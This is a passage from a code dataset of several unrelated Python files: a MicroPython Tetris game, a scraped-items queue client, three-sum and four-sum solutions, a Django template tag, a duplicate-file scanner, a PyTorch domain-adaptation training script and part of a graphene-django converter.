self.isPaused = False\n self.clearBoard()\n\n def set_painter(self, lcd):\n # color = lambda x: ((x & 0xF80000) >> 8) | ((x & 0xFC00) >> 5) | (( x & 0xF8) >> 3)\n # Colors = (0x0, 0xCB2C, 0x666C, 0x6339, 0xCE6C, 0xCB39, 0x6679, 0xDD00)\n Colors = (BLACK, RED, GREEN, BLUE, YELLOW, MAGENTA, CYAN, WHITE)\n self.painter = lcd.framebuf(FIELD_X-2, FIELD_Y, FIELD_WIDTH+2*2, FIELD_HEIGHT, bits=4, lut=Colors)\n self.painter.clear(0)\n\n def shapeAt(self, x, y):\n '''determines shape at the board position'''\n try:\n return self.board[(y * Board.BoardWidth) + x]\n except IndexError:\n return Tetrominoe.NoShape\n\n def setShapeAt(self, x, y, shape):\n '''sets a shape at the board'''\n\n self.board[(y * Board.BoardWidth) + x] = shape\n\n\n def squareWidth(self):\n '''returns the width of one square'''\n\n return FIELD_WIDTH // Board.BoardWidth\n # return self.contentsRect().width() // Board.BoardWidth\n\n def squareHeight(self):\n '''returns the height of one square'''\n return FIELD_HEIGHT // Board.BoardHeight\n # return self.contentsRect().height() // Board.BoardHeight\n\n def start(self):\n '''starts game'''\n\n if self.isPaused:\n return\n\n self.isStarted = True\n self.isWaitingAfterLine = False\n self.numLinesRemoved = 0\n self.clearBoard()\n\n # self.msg2Statusbar.emit(str(self.numLinesRemoved))\n print(str(self.numLinesRemoved))\n\n self.newPiece()\n\n # self.timer.start(Board.Speed, self)\n\n def pause(self):\n '''pauses game'''\n\n if not self.isStarted:\n return\n\n self.isPaused = not self.isPaused\n\n if self.isPaused:\n # self.timer.stop()\n # self.msg2Statusbar.emit(\"paused\")\n print('Paused')\n\n else:\n # self.timer.start(Board.Speed, self)\n # self.msg2Statusbar.emit(str(self.numLinesRemoved))\n print(str(self.numLinesRemoved))\n\n self.update()\n\n\n# def paintEvent(self, event):\n def update(self):\n '''paints all shapes of the game'''\n\n # print(\".\",end='')\n # painter = QPainter(self)\n # rect = self.contentsRect()\n self.painter.clear(0)\n\n # boardTop = rect.bottom() - Board.BoardHeight * self.squareHeight()\n boardTop = FIELD_HEIGHT - Board.BoardHeight * self.squareHeight()\n\n for i in range(Board.BoardHeight):\n for j in range(Board.BoardWidth):\n shape = self.shapeAt(j, Board.BoardHeight - i - 1)\n\n if shape != Tetrominoe.NoShape:\n self.drawSquare(self.painter,\n 2 + j * self.squareWidth(),\n # rect.left() + j * self.squareWidth(),\n boardTop + i * self.squareHeight(), shape)\n\n if self.curPiece.shape() != Tetrominoe.NoShape:\n # print(\"%d\" % self.curPiece.shape(), end='')\n for i in range(4):\n x = self.curX + self.curPiece.x(i)\n y = self.curY - self.curPiece.y(i)\n # self.drawSquare(painter, rect.left() + x * self.squareWidth(),\n self.drawSquare(self.painter, 2 + x * self.squareWidth(),\n boardTop + (Board.BoardHeight - y - 1) * self.squareHeight(),\n self.curPiece.shape())\n\n if not self.isStarted:\n self.painter.color(4, 1)\n self.painter.string(20, 80, 'Game', font=32)\n self.painter.string(20, 80+32, 'Over', font=32)\n self.painter.show()\n # for pt in self.painter:\n # pt.dma_refresh()\n\n def keyPressEvent(self, key):\n '''processes key press events'''\n if not self.isStarted and key == Key_Space:\n key = Key_P\n if not self.isStarted and key == Key_P: # Ping add this for re-start\n self.isPaused = False\n self.start()\n return\n\n if not self.isStarted or self.curPiece.shape() == Tetrominoe.NoShape:\n # super(Board, self).keyPressEvent(event)\n return\n\n # key = event.key()\n\n if key == Key_P:\n self.pause()\n return\n\n if self.isPaused:\n return\n\n elif key == Key_Left:\n self.tryMove(self.curPiece, self.curX - 1, self.curY)\n\n elif key == Key_Right:\n self.tryMove(self.curPiece, self.curX + 1, self.curY)\n\n elif key == Key_Down:\n self.tryMove(self.curPiece.rotateRight(), self.curX, self.curY)\n\n elif key == Key_Up:\n self.tryMove(self.curPiece.rotateLeft(), self.curX, self.curY)\n\n elif key == Key_Space:\n self.dropDown()\n\n elif key == Key_D:\n self.oneLineDown()\n\n\n def timerEvent(self):\n '''handles timer event'''\n\n if self.isPaused:\n return # Do nothing when paused\n\n if self.isWaitingAfterLine:\n self.isWaitingAfterLine = False\n self.newPiece()\n else:\n self.oneLineDown()\n\n def clearBoard(self):\n '''clears shapes from the board'''\n\n self.board.clear() # Ping add this. Important for re-start\n for i in range(Board.BoardHeight * Board.BoardWidth):\n self.board.append(Tetrominoe.NoShape)\n\n\n def dropDown(self):\n '''drops down a shape'''\n newY = self.curY\n\n while newY > 0:\n if not self.tryMove(self.curPiece, self.curX, newY - 1):\n break\n newY -= 1\n self.pieceDropped()\n\n def oneLineDown(self):\n '''goes one line down with a shape'''\n\n if not self.tryMove(self.curPiece, self.curX, self.curY - 1):\n self.pieceDropped()\n\n\n def pieceDropped(self):\n '''after dropping shape, remove full lines and create new shape'''\n\n for i in range(4):\n\n x = self.curX + self.curPiece.x(i)\n y = self.curY - self.curPiece.y(i)\n self.setShapeAt(x, y, self.curPiece.shape())\n\n self.removeFullLines()\n\n if not self.isWaitingAfterLine:\n self.newPiece()\n\n\n def removeFullLines(self):\n '''removes all full lines from the board'''\n\n numFullLines = 0\n rowsToRemove = []\n\n for i in range(Board.BoardHeight):\n\n n = 0\n for j in range(Board.BoardWidth):\n if not self.shapeAt(j, i) == Tetrominoe.NoShape:\n n = n + 1\n\n if n == 10:\n rowsToRemove.append(i)\n\n rowsToRemove.reverse()\n\n for m in rowsToRemove:\n\n for k in range(m, Board.BoardHeight):\n for l in range(Board.BoardWidth):\n self.setShapeAt(l, k, self.shapeAt(l, k + 1))\n\n numFullLines = numFullLines + len(rowsToRemove)\n\n if numFullLines > 0:\n\n self.numLinesRemoved = self.numLinesRemoved + numFullLines\n # self.msg2Statusbar.emit(str(self.numLinesRemoved))\n print(str(self.numLinesRemoved))\n\n self.isWaitingAfterLine = True\n self.curPiece.setShape(Tetrominoe.NoShape)\n self.update()\n\n\n def newPiece(self):\n '''creates a new shape'''\n\n self.curPiece = Shape()\n self.curPiece.setRandomShape()\n self.curX = Board.BoardWidth // 2 + 1\n self.curY = Board.BoardHeight - 1 + self.curPiece.minY()\n\n if not self.tryMove(self.curPiece, self.curX, self.curY):\n\n self.curPiece.setShape(Tetrominoe.NoShape)\n # self.timer.stop()\n # self.isStarted = False\n # self.msg2Statusbar.emit(\"Game over\")\n if self.isStarted:\n self.isStarted = False\n print(\"Game over\")\n\n\n def tryMove(self, newPiece, newX, newY):\n '''tries to move a shape'''\n\n for i in range(4):\n\n x = newX + newPiece.x(i)\n y = newY - newPiece.y(i)\n\n if x < 0 or x >= Board.BoardWidth or y < 0 or y >= Board.BoardHeight:\n return False\n\n if self.shapeAt(x, y) != Tetrominoe.NoShape:\n return False\n\n self.curPiece = newPiece\n self.curX = newX\n self.curY = newY\n self.update()\n\n return True\n\n def drawSquare(self, painter, x, y, shape):\n '''draws a square of a shape'''\n \n BLOCK = b'\\xFF\\xFF\\xFF\\xFF\\xFF\\xFF\\x87\\x03\\x87\\x03\\x87\\x03\\x87\\x03\\xFF\\xFF\\xFF\\xFF\\xFF\\xFF'\n # BLOCK = b'\\x00\\x00' * 10\n painter.color(0, shape)\n painter.monoicon(x, y, 10, 10, BLOCK)\n\nclass Tetrominoe(object):\n\n NoShape = 0\n ZShape = 1\n SShape = 2\n LineShape = 3\n TShape = 4\n SquareShape = 5\n LShape = 6\n MirroredLShape = 7\n\n\nclass Shape(object):\n\n coordsTable = (\n ((0, 0), (0, 0), (0, 0), (0, 0)),\n ((0, -1), (0, 0), (-1, 0), (-1, 1)),\n ((0, -1), (0, 0), (1, 0), (1, 1)),\n ((0, -1), (0, 0), (0, 1), (0, 2)),\n ((-1, 0), (0, 0), (1, 0), (0, 1)),\n ((0, 0), (1, 0), (0, 1), (1, 1)),\n ((-1, -1), (0, -1), (0, 0), (0, 1)),\n ((1, -1), (0, -1), (0, 0), (0, 1))\n )\n\n def __init__(self):\n\n self.coords = [[0,0] for i in range(4)]\n self.pieceShape = Tetrominoe.NoShape\n\n self.setShape(Tetrominoe.NoShape)\n\n\n def shape(self):\n '''returns shape'''\n\n return self.pieceShape\n\n\n def setShape(self, shape):\n '''sets a shape'''\n\n table = Shape.coordsTable[shape]\n\n for i in range(4):\n for j in range(2):\n self.coords[i][j] = table[i][j]\n\n self.pieceShape = shape\n\n\n def setRandomShape(self):\n '''chooses a random shape'''\n\n self.setShape(random.randint(1, 7))\n\n\n def x(self, index):\n '''returns x coordinate'''\n\n return self.coords[index][0]\n\n\n def y(self, index):\n '''returns y coordinate'''\n\n return self.coords[index][1]\n\n\n def setX(self, index, x):\n '''sets x coordinate'''\n\n self.coords[index][0] = x\n\n\n def setY(self, index, y):\n '''sets y coordinate'''\n\n self.coords[index][1] = y\n\n\n def minX(self):\n '''returns min x value'''\n\n m = self.coords[0][0]\n for i in range(4):\n m = min(m, self.coords[i][0])\n\n return m\n\n\n def maxX(self):\n '''returns max x value'''\n\n m = self.coords[0][0]\n for i in range(4):\n m = max(m, self.coords[i][0])\n\n return m\n\n\n def minY(self):\n '''returns min y value'''\n\n m = self.coords[0][1]\n for i in range(4):\n m = min(m, self.coords[i][1])\n\n return m\n\n\n def maxY(self):\n '''returns max y value'''\n\n m = self.coords[0][1]\n for i in range(4):\n m = max(m, self.coords[i][1])\n\n return m\n\n\n def rotateLeft(self):\n '''rotates shape to the left'''\n\n if self.pieceShape == Tetrominoe.SquareShape:\n return self\n\n result = Shape()\n result.pieceShape = self.pieceShape\n\n for i in range(4):\n\n result.setX(i, self.y(i))\n result.setY(i, -self.x(i))\n\n return result\n\n\n def rotateRight(self):\n '''rotates shape to the right'''\n\n if self.pieceShape == Tetrominoe.SquareShape:\n return self\n\n result = Shape()\n result.pieceShape = self.pieceShape\n\n for i in range(4):\n\n result.setX(i, -self.y(i))\n result.setY(i, self.x(i))\n\n return result\n\n### Add this class to handle all keys ###########################\n\nclass Keys(object):\n Key_Values = []\n def __init__(self):\n for name in KeyStruct:\n pin = Pin(name, Pin.IN, pull=Pin.PULL_UP)\n pin.irq(Keys.key_cb, Pin.IRQ_FALLING)\n KeyStruct[name][1] = time.ticks_ms()\n KeyStruct[name][2] = pin\n\n def read_keys(self):\n keys = list(Keys.Key_Values)\n Keys.Key_Values.clear()\n return keys\n\n @staticmethod\n def key_cb(pin):\n now = time.ticks_ms()\n name = pin.name()\n key = KeyStruct[name]\n # debounce = DEBOUNCE_MS*2 if key[0] == Key_Space else DEBOUNCE_MS\n if now - key[1] > DEBOUNCE_MS: # Check ticks\n if key[0] not in Keys.Key_Values and pin.value() == 0:\n Keys.Key_Values.append(key[0])\n # print(name)\n key[1] = now\n\nclass Panel():\n def __init__(self, id, rst, cs=None):\n lcd_spi = SPI(id, SPI.MASTER, bits=8, baudrate=50000000, polarity=1, phase=1)\n lcd_rst= Pin(rst, Pin.OUT, pull=Pin.PULL_UP, value=1)\n if cs:\n lcd_cs =Pin(cs, Pin.OUT, pull=Pin.PULL_UP, value=0)\n self.lcd = LCD154(lcd_spi, lcd_rst)\n if not cs:\n self.lcd.orientation(2)\n self.fb0 = self.lcd.getframe() # Get the basic framebuf\n\n def setup(self, color_table):\n self.desk = self.lcd.framebuf(0, 0, 240, 240, bits=2, lut=color_table)\n self.desk.clear(0)\n self.desk.color(0,1)\n self.desk.show()\n # for x in range(20,240,20):\n # self.desk.line(x, 0, x, SCREEN_HEIGHT)\n # for y in range(20,240,20):\n # self.desk.line(0, y, SCREEN_WIDTH, y)\n # self.desk.string(24, 100, \"Hello World!\", color=3, font=32, mode=1)\n\n # self.ball = self.lcd.framebuf(0, 100, 32, 32, bits=1, lut=(BLACK, RED))\n # self.ball.clear()\n # self.ball.circle(15,15,14,color=1,style=1)\n\n # def update(self):\n # pos = self.track.next()\n # if pos:\n # self.ball.move(pos[0], pos[1])\n # self.ball.showwith(self.desk, mode=1)\n\n\nif __name__ == '__main__':\n\n try:\n timer.deinit() # used to stop timer in 2nd launch\n except:\n pass\n \n lcd = Panel(8, 'PIO1_3', 'PIO0_20')\n lcd.setup( (0x8410, BLACK, GREEN, BLUE) )\n \n gif = open('Count_Down.gif', 'rb')\n lcd.fb0.loadgif(gif, loop=1)\n lpc55.delay(1000)\n\n keys = Keys()\n tetris = Tetris(keys, lcd)\n\n def timerCB(sft):\n tetris.timerCB(sft.time_ms//100)\n\n timer = machine.Timer(-1)\n timer.init(freq=10, callback=timerCB)\n\n","sub_path":"俄罗斯方块/LPCUP_DISK/Tetris_SU.py","file_name":"Tetris_SU.py","file_ext":"py","file_size_in_byte":16319,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"328896372","text":"import sys\n\nfrom tasking_common.config import (\n QUEUE_SERVER,\n QUEUE_DB,\n QUEUE_PORT,\n QUEUE_AUTH_TOKEN,\n QUEUE_SSL, PLATFORM)\n\nfrom nk_queue import SortedQueueClient\nfrom nk_logger import get_logger\n\nfrom tasking_common.utils.string_utils import get_scraped_items_platform_task_queue_name\n\nlogger = get_logger(__name__)\n\n\nclass ScrapedItemsQueue:\n def __init__(self):\n self._sorted_queue_client = SortedQueueClient(\n QUEUE_SERVER,\n QUEUE_PORT,\n QUEUE_DB,\n QUEUE_AUTH_TOKEN,\n QUEUE_SSL,\n )\n self._queue_name = get_scraped_items_platform_task_queue_name(PLATFORM)\n\n def initialize(self):\n self._sorted_queue_client.connect()\n logger.info(f\"{__name__} initialized.\")\n\n def put_scraped_item(self, timestamp, item):\n \"\"\"\n :param timestamp: Represents published_at or created_at date for scraped item\n :param item: Item scraped, generally a json.dumps representation.\n :return: Integer indicating if item was inserted or not (1 or 0).\n \"\"\"\n return self._sorted_queue_client.put(self._queue_name, timestamp, item)\n\n def get_scraped_items(self, min=0, max=sys.maxsize, with_scores=True, start=None, num=None):\n return self._sorted_queue_client.get(\n self._queue_name, min=min, max=max, with_scores=with_scores, start=start, num=num\n )\n\n def remove_scraped_item(self, item):\n return self._sorted_queue_client.delete(self._queue_name, item)\n","sub_path":"tasking_common/queues/scraped_items_queue.py","file_name":"scraped_items_queue.py","file_ext":"py","file_size_in_byte":1527,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"283896486","text":"class Solution:\n \"\"\"\n @param numbers: Give an array numbers of n integer\n @return: Find all unique triplets in the array which gives the sum of zero.\n \"\"\"\n\n# remove duplidate at the end of a loop, after left += 1 or right -= 1, do not do other stuff, otherwise, index out of range\n def threeSum(self, numbers):\n self.result = []\n numbers.sort()\n right = len(numbers) - 1\n for i in range(len(numbers) - 2):\n if i > 0 and numbers[i] == numbers[i - 1]:\n continue\n self.two_sum(numbers, i + 1, right)\n return self.result\n\n def two_sum(self, numbers, left, right):\n i = left - 1\n target = - numbers[i]\n while left < right:\n the_sum = numbers[left] + numbers[right]\n if the_sum == target:\n self.result.append([numbers[i], numbers[left], numbers[right]])\n left += 1\n right -= 1\n while left < right and numbers[left] == numbers[left - 1]:\n left += 1\n while left < right and numbers[right] == numbers[right + 1]:\n right -= 1\n elif the_sum > target:\n right -= 1\n else:\n left += 1\n\n\nclass Solution1:\n \"\"\"\n @param numbers: Give an array\n @param target: An integer\n @return: Find all unique quadruplets in the array which gives the sum of zero\n \"\"\"\n\n def fourSum(self, numbers, target):\n # write your code here\n numbers.sort()\n length = len(numbers)\n res = []\n for i in range(length- 4):\n if i and numbers[i] == numbers[i - 1]:\n continue\n for j in range(i + 1, length - 3):\n if j > i+1 and numbers[j] == numbers[j - 1]:\n continue\n left, right = j + 1, length - 1\n while left < right:\n the_sum = numbers[i] + numbers[j] + numbers[left] + numbers[right]\n if the_sum == target:\n res.append([numbers[i], numbers[j], numbers[left], numbers[right]])\n left += 1\n right -= 1\n while left < right and numbers[left] == numbers[left - 1]:\n left += 1\n while left < right and numbers[right] == numbers[right + 1]:\n right -= 1\n elif the_sum > target:\n right -= 1\n else:\n left += 1\n return res\n","sub_path":"pythonlearn/leetCode/twopointers/n57three_sum_n58_4sum.py","file_name":"n57three_sum_n58_4sum.py","file_ext":"py","file_size_in_byte":2615,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"350830796","text":"# -*- coding: utf-8 -*-\nfrom django import template\nfrom django.utils.html import conditional_escape as esc\nfrom django.utils.safestring import mark_safe\n\nfrom apps.gcd.models import Issue\n\nregister = template.Library()\n\n\ndef last_updated_issues(parser, token):\n \"\"\"\n Display the last updated indexes as a tag\n \"\"\"\n try:\n number = int(token.split_contents()[1])\n except:\n number = 5\n issues = Issue.objects.filter(story_type_count__gt=0, reserved=False)\\\n\t\t\t\t .order_by('-modified')\n last_updated_issues = issues[:number]\n return LastUpdatedNode(last_updated_issues)\n\n\nclass LastUpdatedNode(template.Node):\n def __init__(self, issues):\n self.issues = issues\n def render(self, context):\n return_string = \"\"\n for i in self.issues:\n return_string += \"\" + \\\n esc(i.series) + \" #\" + esc(i.number) + \" (\" + \\\n esc(i.series.publisher.name) + \")
\"\n return mark_safe(return_string)\n\n\nregister.tag('last_updated_issues', last_updated_issues)\n","sub_path":"branches/vieuxbois/pydjango/apps/gcd/templatetags/statustags.py","file_name":"statustags.py","file_ext":"py","file_size_in_byte":1135,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"370843209","text":"# 区分求積法\r\nimport numpy as np\r\n\r\nfs = 10\r\nt = np.arange(fs / 2) / fs\r\nf = 1\r\nT = 0.5\r\nx = np.sin(2 * np.pi * f * t)\r\nS = np.sum(x) * T / fs\r\nprint(S)\r\n","sub_path":"hnammoku/chapter02/01.py","file_name":"01.py","file_ext":"py","file_size_in_byte":159,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"235943505","text":"def file_hash(filepath, calc_hashes = False):\n ''' return the hash of a file'''\n pass\n\nimport os, sys, hashlib\n\ndef recursive_dir(root,path, depth, whole):\n filelist = os.listdir(path)\n # uncomment to show dirs\n # print(' '*(depth*4)+\"[\"+path+\"]\", len(filelist),'files')\n for item in filelist:\n # print(path,item)\n fullpath = path+'\\\\'+item\n if os.path.isdir(fullpath):\n recursive_dir(root,fullpath,depth+1,whole)\n else:\n # print (' '*(depth*4)+path+item)\n si = os.stat(fullpath).st_size\n # files[item]=\n # if si not in sizes:sizes[si] = []\n # sizes[si].append(fullpath.replace(root+'\\\\',''))\n whole.append({\n \"filename\":item,\n \"fullpath\":fullpath,\n \"relative_dir\":fullpath.replace(root,\"\").replace(item,''),\n \"size\":si\n })\n\n\ndef recursive_scan(directory):\n '''duh\n return [{path, dir, filename, size, readable_size, hash}]\n '''\n result = []\n recursive_dir(directory, directory, 0, result)\n return result\n\ndef flushpoint():\n sys.stdout.write('.')\n sys.stdout.flush()\ndef print_overwrite(*s):\n print(s, end='\\r')\ndef generate_index_by_name(report):\n result={}\n for a in report:\n name = a[\"filename\"]\n if name not in result: # multimap trick\n result[name] = []\n result[name].append(a)\n # collision = {k:v if len(v)>1 for (k,v) in result.items()}\n collisions = {k:v for (k,v) in result.items() if len(v)>1}\n filtered = [f for f in filter(lambda a: a[\"filename\"] in collisions, report)]\n return result, collisions, filtered\n # return result, collisions\n\ndef generate_index_by_hash(report):\n hash_map = {}\n i = 0\n for a in report:\n hasher = hashlib.md5()\n with open(a[\"fullpath\"], 'rb') as afile:\n buf = afile.read()\n hasher.update(buf)\n hashed = hasher.hexdigest()\n if hashed not in hash_map:\n hash_map[hashed]=[]\n hash_map[hashed].append(a)\n # flushpoint()\n print_overwrite(i, 'of', len(report)\n # , a['filename']\n )\n i+=1\n print()\n collisions = {k:v for (k,v) in hash_map.items() if len(v)>1}\n return hash_map, collisions\n\ndef generate_index_by_size(report):\n result={}\n for a in report:\n size = a[\"size\"]\n if size not in result: # multimap trick\n result[size] = []\n result[size].append(a)\n # collision = {k:v if len(v)>1 for (k,v) in result.items()}\n collisions = {k:v for (k,v) in result.items() if len(v)>1}\n filtered = [f for f in filter(lambda a: a[\"size\"] in collisions, report)]\n return result, collisions, filtered\n\ndef html_report(collisions, file):\n import htmlshow as hts\n tabled = []\n \n for k,col in collisions.items():\n tabled.append([\n str(len(col)), ', '.join([a[1] for a in col]),\n # ', '.join([a['filename'] for a in col]),\n ', '.join([a[0] for a in col])\n # ', '.join([a['relative_path'] for a in col])\n ])\n\n hts.html_start(file)\n file.write(hts.tablirize(tabled))\n hts.html_finish(file)\n \n","sub_path":"_projlab/dupl-analysis/duplicate_report.py","file_name":"duplicate_report.py","file_ext":"py","file_size_in_byte":3269,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"342368011","text":"from __future__ import print_function\nimport argparse\nfrom utils.utils import *\nimport torch.nn.functional as F\nfrom torch.autograd import Variable\nimport torchvision.transforms as transforms\nfrom data_loader.get_loader import get_loader\nimport numpy as np\nimport os\n\n# Training settings\nparser = argparse.ArgumentParser(description='PyTorch Openset DA')\nparser.add_argument('--batch-size', type=int, default=32, metavar='N',\n help='input batch size for training (default: 64)')\nparser.add_argument('--epochs', type=int, default=1000, metavar='N',\n help='number of epochs to train (default: 10)')\nparser.add_argument('--log-interval', type=int, default=100, metavar='N',\n help='how many batches to wait before logging training status')\nparser.add_argument('--lr', type=float, default=0.001, metavar='LR',\n help='learning rate (default: 0.001)')\nparser.add_argument('--net', type=str, default='resnet152', metavar='B',\n help='which network alex,vgg,res?')\nparser.add_argument('--save', action='store_true', default=False,\n help='save model or not')\nparser.add_argument('--save_path', type=str, default='checkpoint/checkpoint_so', metavar='B',\n help='checkpoint path')\nparser.add_argument('--seed', type=int, default=1, metavar='S',\n help='random seed (default: 1)')\nparser.add_argument('--unit_size', type=int, default=1000, metavar='N',\n help='unit size of fully connected layer')\nparser.add_argument('--update_lower', action='store_true', default=False,\n help='update lower layer or not')\nparser.add_argument('--no_cuda', action='store_true', default=False,\n help='disable cuda')\nparser.add_argument('--source_path', type=str, default='./utils/source_list.txt', metavar='B',\n help='checkpoint path')\nparser.add_argument('--target_path', type=str, default='./utils/target_list.txt', metavar='B',\n help='checkpoint path')\nargs = parser.parse_args()\nargs.cuda = not args.no_cuda and torch.cuda.is_available()\n\nsource_data = args.source_path\ntarget_data = args.target_path\nevaluation_data = args.target_path\n\nbatch_size = args.batch_size\ndata_transforms = {\n source_data: transforms.Compose([\n transforms.Scale(256),\n transforms.RandomHorizontalFlip(),\n transforms.RandomCrop(224),\n transforms.ToTensor(),\n transforms.Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225])\n ]),\n target_data: transforms.Compose([\n transforms.Scale(256),\n transforms.RandomHorizontalFlip(),\n transforms.RandomCrop(224),\n transforms.ToTensor(),\n transforms.Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225])\n ]),\n evaluation_data: transforms.Compose([\n transforms.Scale(256),\n transforms.CenterCrop(224),\n transforms.ToTensor(),\n transforms.Normalize([0.485, 0.456, 0.406], [0.229, 0.224, 0.225])\n ]),\n}\nuse_gpu = torch.cuda.is_available()\ntorch.manual_seed(args.seed)\nif args.cuda:\n torch.cuda.manual_seed(args.seed)\ntrain_loader, test_loader = get_loader(source_data, target_data, evaluation_data,\n data_transforms, batch_size=args.batch_size)\ndataset_train = train_loader.load_data()\ndataset_test = test_loader\n\nnum_class = 7\nclass_list = [\"bicycle\", \"bus\", \"car\", \"motorcycle\", \"train\", \"truck\", \"unk\"]\n\nG, C = get_model(args.net, num_class=num_class, unit_size=args.unit_size)\nif args.cuda:\n G.cuda()\n C.cuda()\nopt_c, opt_g = get_optimizer_visda(args.lr, G, C,\n update_lower=args.update_lower)\n\nprint(args.save_path)\ndef train(num_epoch):\n criterion = nn.CrossEntropyLoss().cuda()\n i = 0\n print('train start!')\n for ep in range(num_epoch):\n G.train()\n C.train()\n for batch_idx, data in enumerate(dataset_train):\n i += 1\n if i % 1000 == 0:\n print('iteration %d', i)\n if args.cuda:\n img_s = data['S']\n label_s = data['S_label']\n img_t = data['T']\n img_s, label_s = Variable(img_s.cuda()), \\\n Variable(label_s.cuda())\n img_t = Variable(img_t.cuda())\n if len(img_t) < batch_size:\n break\n if len(img_s) < batch_size:\n break\n opt_g.zero_grad()\n opt_c.zero_grad()\n feat = G(img_s)\n out_s = C(feat)\n loss_s = criterion(out_s, label_s)\n loss_s.backward()\n opt_g.step()\n opt_c.step()\n opt_g.zero_grad()\n opt_c.zero_grad()\n\n if batch_idx % args.log_interval == 0:\n print('Train Ep: {} [{}/{} ({:.0f}%)]\\tLoss Source: {:.6f}\\t'.format(\n ep, batch_idx * len(data), 70000,\n 100. * batch_idx / 70000, loss_s.data[0]))\n if ep > 0 and batch_idx % 1000 == 0:\n test()\n G.train()\n C.train()\n # adjust_learning_rate(opt_g, args.lr)\n # adjust_learning_rate(opt_c, args.lr)\n\n if args.save:\n if not os.path.exists(args.save_path):\n os.mkdir(args.save_path)\n save_model(G, C, args.save_path+'_'+str(ep))\n\n\ndef test():\n G.eval()\n C.eval()\n correct = 0\n size = 0\n per_class_num = np.zeros((num_class))\n per_class_correct = np.zeros((num_class)).astype(np.float32)\n for batch_idx, data in enumerate(dataset_test):\n #with torch.no_grad():\n if args.cuda:\n img_t, label_t, path_t = data[0], data[1], data[2]\n img_t, label_t = Variable(img_t.cuda(), volatile=True), \\\n Variable(label_t.cuda(), volatile=True)\n feat = G(img_t)\n out_t = C(feat)\n\n pred = out_t.data.max(1)[1] # get the index of the max log-probability\n # pred_tmp = pred.cpu().numpy()\n # pred_ind = np.where(pred_tmp==13)[0]\n # pred_tmp[pred_ind] = 12\n # pred = torch.from_numpy(pred_tmp)\n\n k = label_t.data.size()[0]\n correct += pred.eq(label_t.data).cpu().sum()\n pred = pred.cpu().numpy()\n for t in range(num_class):\n t_ind = np.where(label_t.data.cpu().numpy() == t)\n correct_ind = np.where(pred[t_ind[0]] == t)\n per_class_correct[t] += float(len(correct_ind[0]))\n per_class_num[t] += float(len(t_ind[0]))\n size += k\n per_class_acc = per_class_correct / per_class_num\n\n print(\n '\\nTest set including unknown classes: Accuracy: {}/{} ({:.0f}%) ({:.4f}%)\\n'.format(\n correct, size,\n 100. * correct / size, float(per_class_acc.mean())))\n for ind, category in enumerate(class_list):\n print('%s:%s' % (category, per_class_acc[ind]))\n\n\ntrain(args.epochs + 1)\n","sub_path":"trainer_osda_sourceonly.py","file_name":"trainer_osda_sourceonly.py","file_ext":"py","file_size_in_byte":7030,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"30"}
+{"seq_id":"220410152","text":"import re\r\nfrom collections import OrderedDict\r\n\r\nfrom django.contrib.postgres.fields import ArrayField, HStoreField, RangeField\r\nfrom django.db import models\r\nfrom django.utils.encoding import force_text\r\nfrom django.utils.translation import ugettext_lazy as _\r\nfrom graphene import (Field, ID, Boolean, Dynamic, Enum, Float, Int, List, NonNull, String, UUID)\r\nfrom graphene.types.datetime import DateTime, Time\r\nfrom graphene.types.json import JSONString\r\nfrom graphene.utils.str_converters import to_camel_case, to_const\r\nfrom graphene_django.fields import DjangoListField\r\nfrom graphene_django.utils import import_single_dispatch, get_model_fields\r\nfrom rest_framework.fields import JSONField\r\nfrom rest_framework.compat import get_related_model\r\n\r\nfrom .fields import DjangoFilterListField\r\nfrom .utils import is_required\r\n\r\nsingledispatch = import_single_dispatch()\r\n\r\n\r\nNAME_PATTERN = r'^[_a-zA-Z][_a-zA-Z0-9]*$'\r\nCOMPILED_NAME_PATTERN = re.compile(NAME_PATTERN)\r\n\r\n\r\ndef assert_valid_name(name):\r\n \"\"\"Helper to assert that provided names are valid.\"\"\"\r\n assert COMPILED_NAME_PATTERN.match(name), 'Names must match /{}/ but \"{}\" does not.'.format(NAME_PATTERN, name)\r\n\r\n\r\ndef convert_choice_name(name):\r\n name = to_const(force_text(name))\r\n try:\r\n assert_valid_name(name)\r\n except AssertionError:\r\n name = \"A_%s\" % name\r\n return name\r\n\r\n\r\ndef get_choices(choices):\r\n converted_names = []\r\n for value, help_text in choices:\r\n if isinstance(help_text, (tuple, list)):\r\n for choice in get_choices(help_text):\r\n yield choice\r\n else:\r\n name = convert_choice_name(value)\r\n while name in converted_names:\r\n name += '_' + str(len(converted_names))\r\n converted_names.append(name)\r\n description = help_text\r\n yield name, value, description\r\n\r\n\r\ndef convert_django_field_with_choices(field, registry=None, input_flag=None):\r\n choices = getattr(field, 'choices', None)\r\n if choices:\r\n meta = field.model._meta\r\n\r\n name = to_camel_case('{}_{}_{}'.format(meta.object_name, field.name, 'Input')) \\\r\n if input_flag \\\r\n else to_camel_case('{}_{}'.format(meta.object_name, field.name))\r\n\r\n enum_type = registry.get_type_for_enum(name)\r\n if enum_type:\r\n return enum_type\r\n else:\r\n choices = list(get_choices(choices))\r\n named_choices = [(c[0], c[1]) for c in choices]\r\n named_choices_descriptions = {c[0]: c[2] for c in choices}\r\n\r\n class EnumWithDescriptionsType(object):\r\n @property\r\n def description(self):\r\n return named_choices_descriptions[self.name]\r\n\r\n enum = Enum(name, list(named_choices), type=EnumWithDescriptionsType)\r\n\r\n registry.register_enum(enum, key=name)\r\n\r\n return enum(description=field.help_text, required=is_required(field, input_flag))\r\n return convert_django_field(field, registry, input_flag)\r\n\r\n\r\ndef construct_fields(model, registry, only_fields, exclude_fields, input_flag=None):\r\n _model_fields = get_model_fields(model)\r\n\r\n fields = OrderedDict()\r\n\r\n if input_flag == 'delete':\r\n converted = convert_django_field_with_choices(dict(_model_fields)['id'], registry)\r\n fields['id'] = converted\r\n else:\r\n for name, field in _model_fields:\r\n if input_flag == 'create' and name == 'id':\r\n continue\r\n\r\n is_not_in_only = only_fields and name not in 